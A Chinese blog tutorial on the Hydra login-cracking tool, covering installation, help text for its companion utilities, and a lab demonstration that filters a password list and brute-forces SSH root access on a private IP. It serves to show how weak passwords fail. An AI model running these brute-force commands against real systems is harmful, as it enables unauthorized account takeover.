计算机网络实用工具之Hydra

已于 2023-12-07 21:59:41 修改
阅读量575 收藏 5
点赞数 6
分类专栏: 系统 网络安全 文章标签: 计算机网络 网络安全 系统安全
于 2023-12-07 21:55:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hougang/article/details/134865259
版权

简介

Hydra 是一个并行登录破解程序,支持多种协议进行攻击。它非常快速且灵活,并且很容易添加新模块。 该工具使研究人员和安全顾问能够展示远程未经授权访问系统是多么容易。

目前该工具支持以下协议:

 Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,  HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY,  HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST,  HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener,  Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin,  Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5,  SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth,  VNC and XMPP.

※注意:不要用于非法目的,不要用于非授权测试,本文意在说明弱密码的不安全性

官网

GitHub - vanhauser-thc/thc-hydra: hydra

安装

# ubuntu 20.04
# 安装hydra
root@ubuntu:~# sudo apt install hydra

# 安装xhydra,该软件包为 Hydra 提供基于 GTK+ 的 GUI
root@ubuntu:~# sudo apt install hydra-gtk

使用帮助

hydra

root@ubuntu:~# hydra -h
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode 
  -O        use old SSL v2 and v3
  -q        do not print messages about connection errors
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

dpl4hydra

root@ubuntu:~# dpl4hydra -h
dpl4hydra v0.9.9 (c) 2012 by Roland Kessler (@rokessler)

Syntax: dpl4hydra [help] | [refresh] | [BRAND] | [all]

This script depends on a local (d)efault (p)assword (l)ist called
/root/.dpl4hydra/dpl4hydra_full.csv. If it is not available, regenerate it with
'dpl4hydra refresh'. Source of the default password list is
http://open-sez.me

Options:
  help        Help: Show this message
  refresh     Refresh list: Download the full (d)efault (p)assword (l)ist
              and generate a new local /root/.dpl4hydra/dpl4hydra_full.csv file. Takes time!
  BRAND       Generates a (d)efault (p)assword (l)ist from the local file
              /root/.dpl4hydra/dpl4hydra_full.csv, limiting the output to BRAND systems, using
              the format username:password (as required by THC hydra).
              The output file is called dpl4hydra_BRAND.lst.
  all         Dump list of all systems credentials into dpl4hydra_all.lst.

Example:
# dpl4hydra linksys
File dpl4hydra_linksys.lst was created with 20 entries.
# hydra -C ./dpl4hydra_linksys.lst -t 1 192.168.1.1 http-get /index.asp

 hydra-wizard

# 向导方式执行hydra
root@ubuntu:~# man hydra-wizard
HYDRA-WIZARD(1)                                                          General Commands Manual                                                          HYDRA-WIZARD(1)

NAME
       HYDRA-WIZARD - Wizard to use hydra from command line

DESCRIPTION
       This script guide users to use hydra, with a simple wizard that will make the necessary questions to launch hydra from command line a fast and easily
       1. The wizard ask for the service to attack
       2. The target to attack
       3. The username o file with the username what use to attack
       4. The password o file with the passwords what use to attack
       5. The wizard ask if you want to test for passwords same as login, null or reverse login
       6. The wizard ask for the port number to attack
       Finally, the wizard show the resume information of attack, and ask if you want launch attack

SEE ALSO
       hydra(1), dpl4hydra(1),

AUTHOR
       hydra-wizard was written by Shivang Desai <shivang.ice.2010@gmail.com>.

       This manual page was written by Daniel Echeverry <epsilon77@gmail.com>, for the Debian project (and may be used by others).

pw-inspector

# 基于已有的密码字典,按规则过滤并生成新的密码字典
root@ubuntu:~# pw-inspector
PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [https://github.com/vanhauser-thc/thc-hydra]

Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s

Options:
  -i FILE    file to read passwords from (default: stdin)
  -o FILE    file to write valid passwords to (default: stdout)
  -m MINLEN  minimum length of a valid password
  -M MAXLEN  maximum length of a valid password
  -c MINSETS the minimum number of sets required (default: all given)
Sets:
  -l         lowcase characters (a,b,c,d, etc.)
  -u         upcase characters (A,B,C,D, etc.)
  -n         numbers (1,2,3,4, etc.)
  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
  -s         special characters - all others not withint the sets above

PW-Inspector reads passwords in and prints those which meet the requirements.
The return code is the number of valid passwords found, 0 if none was found.
Use for security: check passwords, if 0 is returned, reject password choice.
Use for hacking: trim your dictionary file to the pw requirements of the target.
Usage only allowed for legal purposes.

使用示例

从已有密码字典生成新密码字典

# 从已有密码字典中过滤出长度为5-7位的密码
root@ubuntu:~# pw-inspector -i ./passwd.list -o ./new_passwd.list -m 5 -M 7

# 原密码文件
root@ubuntu:~# cat passwd.list 
1234
12345
123456
1234567
12345678
123456789

# 新密码文件
root@ubuntu:~# cat new_passwd.list 
12345
123456
1234567

使用密码字典进行密码猜解

# 用户:root,密码字典:new_passwd.list,协议:ssh,目标:192.168.21.131
root@ubuntu:~# hydra -l root -P new_passwd.list ssh://192.168.21.131
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-07 13:52:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking ssh://192.168.21.131:22/
[22][ssh] host: 192.168.21.131   login: root   password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-07 13:52:41

种草

本文为"计算机网络实用工具系列"的内容之一,会持续更新其它相关博文。

我的博文内容主要针对“计算机网络”、“安全”、“运维”和“云计算”方向,感兴趣朋友的请关注我,我将不定期发布新的博文并不断改进已发布博文。

后期依据大家对博文的评论,点赞及关注情况,针对大家感兴趣的内容我也会录制视频并整理出成套的学习资料免费分享给大家,期待能和大家一起交流学习。

hougang
关注
专栏目录
19-5 hydra爆破
weixin_43263566的博客
01-06 1482
Hydra 支持多种协议和服务,包括常见的 SSH、FTP、Telnet、HTTP、SMTP 等。可以通过命令行参数来配置 Hydra 的行为,例如指定要攻击的目标、设置并发连接数、定义用户名和密码列表等。它通常用于渗透测试和安全评估,以帮助发现系统中存在的安全漏洞,并加强对这些漏洞的防范。请注意,在使用Hydra进行安全测试时,必须遵守法律和道德规范,并且仅在授权的系统上进行测试。数据库通常会提供默认账户,如SQL Server的sa用户、MySQL的root用户、Oracle的System用户等。
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)
热门推荐
杨秀璋的专栏
01-13 1万+
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台获取邀请码、注册过程。本文将分享Web渗透三道入门题目,它们包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。基础性文章,希望对您有所帮助!
九头蛇安全测试工具(Hydra v9.1)
08-10
一款功能强大,目的合法,易于操作的安全测试工具 此Windows适用版本为Thomas D.提供的脚本,供大家研究学习之用 下载后直接解压至D盘即可(任意)
Hydra 工具箱
weixin_42102555的博客
07-17 377
hydra:海德拉 (希腊神话中的九头怪蛇) 功能:用于端口爆破 -h:[-h]帮助文档 -l:[-l]指定单个用户 -p:[-p]指定单个密码 -L:[-L username.txt]用户名字典 -P:[-P password.txt]密码字典 -v:[-v]过程打印出来 -o:[-o]指定输出文件 -t:[-t]同时运行线程数 -e:[-e ns]n空密码试探,s指定用户和密码试探 实例1:hydra -P password.txt 服务名://目标IP:服务端口号 ssh实例22:hydra -L u
linux安全软件Hydra使用教程
最新发布
u010674101的专栏
09-14 1237
Hydra 是一个强大的网络登录破解工具,常用于渗透测试,支持对多种服务和协议(如 SSH、FTP、HTTP 等)进行暴力破解攻击。它可以通过字典攻击来测试用户名和密码的有效性。
Hydra(九头蛇)工具使用(非常详细)从零基础入门到精通,看完这一篇就够了。
m0_59598029的博客
09-24 1万+
hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。
Hydra
qq_44228793的博客
11-27 487
Hydra 简介 hydra 是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码,目前已经被Backtrack和kali等渗透平台收录,除了命令行下的hydra外,还提供了hydragtk版本(有图形界面的hydra), 官网网站:http://www.thc.org/thc-hydra , 目前最新版本为7.6下载地址:http://www.thc.org/releases/hydra-7.6.tar.gz ,它可支持AFP, Cisco AAA, Cisco auth, Cisc
hydra
dust_hk的博客
01-23 1318
hydra知识点总结 简介 • hydra著名黑客组织THC 的一款开源的暴力破解工 具。 • Hydra 支持多平台版本 • 对需要网络登录的系统进 行快速的字典攻击—在线 攻击。 • 支持大量的服务,包括 FTP/POP3/IMAP/Telnet/S SH 等。 主要命令参数 -R 恢复上次的破解进度,继续破解 -S 使用ssl连接 -s &lt; PORT &gt; 自定义端口号(代替默认端...
Kali中Hydra攻击HTTP基本身份验证-计算机网络技术二班-阿布都艾尼
m0_64091527的博客
05-29 255
我们还应该在可能的情况下限制对受攻击系统的访问,以减少风险。这一步可以利用常见用户名、社交媒体信息以及其他可获得的信息来完成,一旦找到了用户名,攻击者就会利用密码字典试图找到正确的密码。密码字典是由一系列可能的密码组合组成的文本文件,这些密码组合可以是常见密码、常用短语或单词。Hydra攻击利用密码字典或暴力破解技术尝试许多可能的密码组合,并使用组合来攻击受害者的账户。另外,定期更改密码也是非常重要的,可以防止已知的密码被利用攻击。防范Hydra攻击的最基本措施是使用强密码,这可以大大降低被攻击的风险。
八大常用渗透测试工具
xuyx001的博客
08-24 5265
渗透测试
Hydra攻击HTTP基本身份验证
m0_73630977的博客
05-26 552
与其他身份验证方法(例如基于表单的身份验证方法)不同,基本身份验证在发送到服务器的内容、如何发送以及期望从服务器得到的响应方面是标准的。这允许攻击者和渗透测试人员节省宝贵的分析时间,这些工作涉及的参数包含用户名和密码、如何处理,发送这些参数以及如何区分成功响应和不成功响应。:THC Hydra(简称Hydra)是一个可以进行在线登录验证的工具,kali下是默认安装的,几乎支持所有协议的在线破解;这意味着Hydra将首先使用单个密码尝试所有的用户名,然后继续使用下一个密码。这将有助于防止账户锁定。
hydra 一键安装包
01-07
Hydra一键安装包,内含脚本,直接运行脚本就可以安装了,由冰河大神亲自整理
Hydra(九头蛇)工具使用
剁椒鱼头没剁椒的博客
01-03 1万+
hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。
hydra暴力破解工具
测试开发小记
03-31 3618
目录Hydra安装Ubuntu安装centos系统安装windows安装Hydra参数说明Hydra使用实例破解ssh破解ftp/telnet破解MySQL数据库批量破解多个主机:`-M`参数 Hydra是一款暴力破解工具,进行并行登录破解,破解远程服务的用户名密码,由黑客组织THC开发,它可以对超过50个协议进行快速字典攻击,包括telnet、ftp、http(s)、smb、MySQL、SMTP等。 Hydra安装 官方github地址:https://github.com/vanhauser-thc/t
hydra,一个超级厉害的 Python 库!
涛哥聊Python
01-14 3478
Python Hydra是一个Python库,用于配置管理和应用程序的多环境支持。它可以将应用程序的配置信息与代码分离,从而使配置更容易管理和维护。Python Hydra是一个强大的配置管理工具,可以管理多个环境下的配置,并确保应用程序的一致性。它提供了多环境支持、分层配置、命令行界面、插值和模块化配置等丰富的功能,使配置管理变得更加容易和灵活。希望本文的介绍和示例能够帮助大家入门Python Hydra,并启发在项目中使用它来管理配置。
口令爆破 --Hydra
我不是大牛
07-09 4166
内容: 简介 查看帮助 参数说明 Hydra的使用—爆破FTP 服务 图形界面 破解3389 远程桌面连接 破解SSH 服务 Hydra—简介 • hydra著名黑客组织THC的一款开源的暴力破解工具。 • Hydra 支持多平台版本 • 对需要网络登录的系统进行快速的字典攻击—在线攻击。 • 支持大量的服务,包括FTP/POP3/IMAP/Telnet/SSH 等。 Hydra—查看帮助 命令 ...
hydra详解(仅供学习参考)
m0_50818626的博客
07-11 1546
Hydra是一款非常强大的暴力破解工具,由著名的黑客组织THC开发的一款开源暴力破解工具。hydra 参数 IP 服务。2、 加载对应命令开始爆破。三、各类协议破解具体方法。
kail怎么对outlook进行安全性测试
06-08
Kali Linux 是一款专门针对渗透测试和网络安全的操作系统,提供了很多有用的工具来测试和评估 Outlook 的安全性。以下是一些常用的方法: 1. 使用漏洞扫描工具:Kali Linux 中内置了多个漏洞扫描工具,如 Nmap、OpenVAS、Nikto 等,这些工具可以扫描 Outlook 所在的服务器和计算机,检测其中可能存在的漏洞和安全问题。 2. 发送钓鱼电子邮件:使用 Kali Linux 中的邮件伪造工具,可以发送钓鱼电子邮件来测试 Outlook 用户的防范意识和反应能力。这可以帮助组织评估员评估 Outlook 用户的安全意识。 3. 进行渗透测试:Kali Linux 中的渗透测试工具可以模拟攻击者对 Outlook 进行攻击,如使用 Metasploit 进行漏洞利用、使用 Hydra 进行密码破解等。这些测试可以帮助组织评估 Outlook 的安全性,并及时采取措施来提高安全性。 需要注意的是,测试 Outlook 的安全性需要得到组织的授权,并且测试过程中需要严格遵守法律法规和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hougang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值